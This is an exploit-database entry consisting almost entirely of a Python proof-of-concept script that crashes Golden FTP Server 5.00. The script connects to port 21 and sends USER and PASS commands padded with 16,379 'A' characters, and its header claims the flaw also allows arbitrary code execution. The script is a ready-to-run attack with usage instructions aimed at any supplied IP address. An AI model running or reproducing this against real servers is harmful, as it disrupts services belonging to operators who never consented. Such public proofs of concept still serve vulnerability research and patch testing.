Golden FTP 5.00 Denial Of Service



EKU-ID: 4888 CVE: OSVDB-ID:
Author: 4Lu5h Published: 2015-06-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python

#Both Golden Pro And Free FTP server is  prone to a remote DOS vulnerability.POC

#Attackers can exploit this issue to execute arbitrary code or cause denial-of-service conditions.

#-------------------------------------------------------------------------
#Exploit Title : Golden FTP Server DOS vulnerability.
#Date   : 2015.06.01
#Exploit Author  : 4Lu5h
#Email   : kfalus@gmail.com
#Product Homepage: www.goldenftpserver.com
#Software Link  : http://www.goldenftpserver.com/statdir/stat.php?id=download_pro
#Product: Golden Pro FTP Server
#Version : 5.00
#Tested Os : Windows XP SP1/SP3 TR
#--------------------------------------------------------------------------


import socket
import sys

def usage():
	 print "usage  : ./goldenftp.py <ip > "
      	 print "example: ./goldenftp.py 192.168.189.19"

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)

if len(sys.argv) != 2:
        usage()
        sys.exit()

ip = sys.argv[1]

buff = "A" * 16379

try:
	print("[-] Connecting to " + ip + " for exploitation..\n")
	s.connect((ip,21))
	s.recv(1024)
	print "[-] Connected to server"
	print "[-] Sending exploit"
	s.send('USER '+buff+'\r\n') #if fails try username test 
	s.send('PASS '+buff+'\r\n')
	s.close()
	print("[-] Exploit successfully sent...")
except:
	print "[-] Exploit failed.. Check if server is up.."